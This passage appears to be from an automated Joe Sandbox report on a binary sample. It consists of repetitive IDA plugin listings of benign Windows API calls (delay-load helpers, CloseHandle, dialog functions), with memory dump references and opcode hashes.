          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F6FC
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F6FC
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F6FC
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013FD5A
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • DestroyWindow.USER32(?,00000000,0013E640,?,?,00000001,?,?,0013C999,001560F0,00181CF0,00181CF0,00001000,?,00000000,?), ref: 0013A241
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: DestroyWindow
        • String ID:
        • API String ID: 3375834691-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 0d1836c08117d54ffa727193eb0c87bd9f37a364695593bbf10df0b015ffa23b
        • Instruction ID: 6b2ee505123b019203fc1e26972e535f2054c5632e65826e26324f50ab2165df
        • Opcode Fuzzy Hash: 0d1836c08117d54ffa727193eb0c87bd9f37a364695593bbf10df0b015ffa23b
        • Instruction Fuzzy Hash: DFA00295569102BCF55861517D16D36021CD4D4B55771452EF412C448596401946A571
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: fd6b2bb091518109d18c9c14ece474653252ad5ef397b6b0e8d414305614e2ee
        • Instruction ID: e0b9b72a16f26a49ce2a1fba60a52dd9470069afb7b1461c1996915c73ebefc4
        • Opcode Fuzzy Hash: fd6b2bb091518109d18c9c14ece474653252ad5ef397b6b0e8d414305614e2ee
        • Instruction Fuzzy Hash: 22A011C2AE8000BEF2082A203E02E3A020CC0E0B22B32802FF822C8080AB80080B2230
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 80f79219d550d2556d8ac522f0b18299eff56b709a66a6e606a69b0ef00da118
        • Instruction ID: fec5bdec1dd9831425c9c2672d42f52f10191c5d9f3916543852b072312fbc9b
        • Opcode Fuzzy Hash: 80f79219d550d2556d8ac522f0b18299eff56b709a66a6e606a69b0ef00da118
        • Instruction Fuzzy Hash: 16A012C15E8001BDF10821103C02E36010CC0D4B51B31442FF402C40805740080B1130
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 8aa70c4be8ead8bde49639ffd8b0cc0a3fa93617aa2d3cf1dc5f21a62b7c0fc7
        • Instruction ID: fec5bdec1dd9831425c9c2672d42f52f10191c5d9f3916543852b072312fbc9b
        • Opcode Fuzzy Hash: 8aa70c4be8ead8bde49639ffd8b0cc0a3fa93617aa2d3cf1dc5f21a62b7c0fc7
        • Instruction Fuzzy Hash: 16A012C15E8001BDF10821103C02E36010CC0D4B51B31442FF402C40805740080B1130
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 42a2dc8d35baa026d8fb8ae02b86ebe42c5038f9854d3bc470251e3bb84c378e
        • Instruction ID: fec5bdec1dd9831425c9c2672d42f52f10191c5d9f3916543852b072312fbc9b
        • Opcode Fuzzy Hash: 42a2dc8d35baa026d8fb8ae02b86ebe42c5038f9854d3bc470251e3bb84c378e
        • Instruction Fuzzy Hash: 16A012C15E8001BDF10821103C02E36010CC0D4B51B31442FF402C40805740080B1130
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 3df54c2de1fe6c75f1b7d87891227e8bd598a0f6a0574bd9287ba6056ef9cce4
        • Instruction ID: fec5bdec1dd9831425c9c2672d42f52f10191c5d9f3916543852b072312fbc9b
        • Opcode Fuzzy Hash: 3df54c2de1fe6c75f1b7d87891227e8bd598a0f6a0574bd9287ba6056ef9cce4
        • Instruction Fuzzy Hash: 16A012C15E8001BDF10821103C02E36010CC0D4B51B31442FF402C40805740080B1130
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 6d907ace73af6d478d5fe0f07f73cc6a2f55ded94fdebe1acb2c99091174d14f
        • Instruction ID: fec5bdec1dd9831425c9c2672d42f52f10191c5d9f3916543852b072312fbc9b
        • Opcode Fuzzy Hash: 6d907ace73af6d478d5fe0f07f73cc6a2f55ded94fdebe1acb2c99091174d14f
        • Instruction Fuzzy Hash: 16A012C15E8001BDF10821103C02E36010CC0D4B51B31442FF402C40805740080B1130
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 8f033f8b5f06cc0c4aad092a232d2aca9d44ff1ab1420b3b4ed407e4162296cc
        • Instruction ID: b5581386643e8e893a11a1e4206e42cd936ddc352d080cb9b927944ce6c35301
        • Opcode Fuzzy Hash: 8f033f8b5f06cc0c4aad092a232d2aca9d44ff1ab1420b3b4ed407e4162296cc
        • Instruction Fuzzy Hash: 68A001D6AB9102BCF21872617D17E7B021CC4E8B6AB31893EF812D84D1AA80184A2671
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: f610a86becb49c1cf745fa79e517c8d3e616023c7468a0d41326e80ee64c2aa8
        • Instruction ID: b5581386643e8e893a11a1e4206e42cd936ddc352d080cb9b927944ce6c35301
        • Opcode Fuzzy Hash: f610a86becb49c1cf745fa79e517c8d3e616023c7468a0d41326e80ee64c2aa8
        • Instruction Fuzzy Hash: 68A001D6AB9102BCF21872617D17E7B021CC4E8B6AB31893EF812D84D1AA80184A2671
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 9eb488e273f6384440f866aa9fcb369ef68bd84c76191b45cff68cc55b00ae5e
        • Instruction ID: b5581386643e8e893a11a1e4206e42cd936ddc352d080cb9b927944ce6c35301
        • Opcode Fuzzy Hash: 9eb488e273f6384440f866aa9fcb369ef68bd84c76191b45cff68cc55b00ae5e
        • Instruction Fuzzy Hash: 68A001D6AB9102BCF21872617D17E7B021CC4E8B6AB31893EF812D84D1AA80184A2671
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 7a8f4ce62a7fb6e139ca40be20809eda5bda95df6f3a571b96e4373c2dbf5d1e
        • Instruction ID: b5581386643e8e893a11a1e4206e42cd936ddc352d080cb9b927944ce6c35301
        • Opcode Fuzzy Hash: 7a8f4ce62a7fb6e139ca40be20809eda5bda95df6f3a571b96e4373c2dbf5d1e
        • Instruction Fuzzy Hash: 68A001D6AB9102BCF21872617D17E7B021CC4E8B6AB31893EF812D84D1AA80184A2671
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: a52a00048d4305b19cf3300e13c2c09a4be2aa5e497f14be9452da529889acce
        • Instruction ID: b5581386643e8e893a11a1e4206e42cd936ddc352d080cb9b927944ce6c35301
        • Opcode Fuzzy Hash: a52a00048d4305b19cf3300e13c2c09a4be2aa5e497f14be9452da529889acce
        • Instruction Fuzzy Hash: 68A001D6AB9102BCF21872617D17E7B021CC4E8B6AB31893EF812D84D1AA80184A2671
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F6FC
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 2eda7b0cfe88278358407d4051718fd6fa70158001da75eb895437cb88da2701
        • Instruction ID: 8bc518e27482e136e50932c8f23971e0c9f9d6d2f2b08918352d2f87418aede6
        • Opcode Fuzzy Hash: 2eda7b0cfe88278358407d4051718fd6fa70158001da75eb895437cb88da2701
        • Instruction Fuzzy Hash: 02A002D55792027DF11861517D57D36111CC4E1B15771456EF521D44915A80194A1175
        APIs
        • CloseHandle.KERNEL32(000000FF,?,?,0012A83D,?,?,?,?,?,001537FF,000000FF), ref: 0012A89B
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: a21930b1bb7e56aba248eefb71e0e3c567eb0d2e9446ff0ea14ff8fa3af33276
        • Instruction ID: 05999521e818dde92c93206fded05a4f76b62715b486bce52c0fdfc0c26c5359
        • Opcode Fuzzy Hash: a21930b1bb7e56aba248eefb71e0e3c567eb0d2e9446ff0ea14ff8fa3af33276
        • Instruction Fuzzy Hash: 10F0E230081B219FEB308A24E858792B3E4AF12326F041B5ED0E2438E0D37069AE8B41
        APIs
          • Part of subcall function 001212F6: GetParent.USER32(?), ref: 0012132A
          • Part of subcall function 001212F6: GetDlgItem.USER32(00000000,00003021), ref: 0012133A
          • Part of subcall function 001212F6: SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0013D4A1
        • EndDialog.USER32(?,00000006), ref: 0013D4B4
